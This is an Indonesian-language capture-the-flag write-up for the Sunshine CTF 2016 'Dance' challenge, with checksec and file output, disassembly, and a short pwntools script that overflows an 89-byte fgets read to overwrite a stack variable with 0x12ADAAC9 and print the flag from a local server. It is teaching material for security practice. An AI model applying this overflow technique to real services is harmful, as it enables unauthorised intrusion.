[Sunshine CTF 2016] Dance (55 Poin)

Masalah

Diberikan berkas dance_noflag, temukan kelemahan dan eksploitasi berkas tersebut!

Penyelesaian

Pengumpulan Informasi

Lakukan pemeriksaan binary dengan menggunakan checksec, periksa jenis berkas dengan file dan jalankan binary secara normal serta dekompilasi kode dengan IDA.

$ file dance_noflag
dance_noflag: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=af63a443bb686d83246e6e21c221eab4a40a4188, not stripped

$ checksec dance_noflag
[*] '/home/dummy/Private/0x7079/pwn/sunshine-ctf-2016/dance-55/dance_noflag'
    Arch:     i386-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

$ ./dance_noflag 
welcome to the pro club. you just paid a door fee and have no respect. earn ur cred on the dancefloor!
give us ur sick dance moves like so:
whip,naenae,whip,whip,naenae<ENTER>
whip
do the whip!
   (;P)
 8=/||\_
_/¯    ¯\_

cool dance! come again!

Dekompilasi

push    ebp
mov     ebp, esp
push    esi
sub     esp, 0D4h
mov     eax, 0
mov     ecx, 50h
lea     edx, [ebp+s]
mov     [ebp+var_8], 0
mov     [ebp+var_C], 0
mov     [ebp+var_10], 0
mov     [esp], edx      ; s
mov     dword ptr [esp+4], 0 ; c
mov     dword ptr [esp+8], 50h ; n
mov     [ebp+var_68], eax
mov     [ebp+var_6C], ecx
call    _memset
lea     eax, aWelcomeToThePr ; "welcome to the pro club. you just paid "...
mov     [ebp+var_C], 12ADAAC9h
mov     [esp], eax      ; format
call    _printf
mov     ecx, ds:stdout@@GLIBC_2_0
mov     [esp], ecx      ; stream
mov     [ebp+var_70], eax
call    _fflush
mov     ecx, 59h
lea     edx, [ebp+s]
mov     esi, ds:__bss_start
mov     [esp], edx      ; s
mov     dword ptr [esp+4], 59h ; n
mov     [esp+8], esi    ; stream
mov     [ebp+var_74], eax
mov     [ebp+var_78], ecx
call    _fgets
lea     ecx, [ebp+s]
mov     [ebp+var_64], ecx
mov     [ebp+var_7C], eax

loc_8048641:
mov     eax, [ebp+var_64]
mov     [esp], eax      ; s
call    _strlen
cmp     eax, 0
jbe     loc_804877F


loc_804877F:
cmp     [ebp+var_C], 12ADAAC9h
jnz     loc_80487C6

cmp     [ebp+var_10], 0
jz      loc_80487C1

lea     eax, aGirlUCanDanceW ; "girl u can dance w the best of em. the "...
mov     [esp], eax      ; format
call    _printf
mov     ecx, ds:stdout@@GLIBC_2_0
mov     [esp], ecx      ; stream
mov     [ebp+var_B0], eax
call    _fflush
mov     [ebp+var_B4], eax

Poin-poin informasi yang didapatkan antara lain:

  • Binary diproteksi dengan NX
  • Jenis berkasnya Linux 32 bit.
  • Binary memiliki opsi: whip dan naenae.
  • Terdapat struktur kondisi cmp [ebp+var_C], 12ADAAC9h yang apabila nilainya benar maka binary akan mencetak Flag.
  • Adapun jumlah byte yang diperbolehkan adalah 89.

Identifikasi Kelemahan

Berdasarkan pengumpulan informasi, terdapat kelemahan bahwa binary dapat dieksploitasi dengan mengisi buffer sebesar 89 byte dengan komposisi: 84 byte sebagai junk, 4 byte bernilai 0x12ADAAC9 dan 1 byte bernilai \n.

Akhir

Untuk eksploitasi bisa menggunakan script dibawah ini.

from pwn import *

host = remote('localhost', 31337)

payload = 'A'*84
payload += p32(0x12ADAAC9)

host.sendline(payload)
log.info(host.recv())

Luaran.

$ python solver.py
[+] Opening connection to localhost on port 31337: Done
[*] welcome to the pro club. you just paid a door fee and have no respect. earn ur cred on the dancefloor!
    give us ur sick dance moves like so:
    whip,naenae,whip,whip,naenae<ENTER>
    girl u can dance w the best of em. the pw to our vip lounge is: this-is-the-flag-on-srv

    cool dance! come again!
[*] Closed connection to localhost port 31337

Simpulan

Eksploitasi binary dengan menimpa stack agar mendapatkan nilai variabel yang diinginkan.

results matching ""

    No results matching ""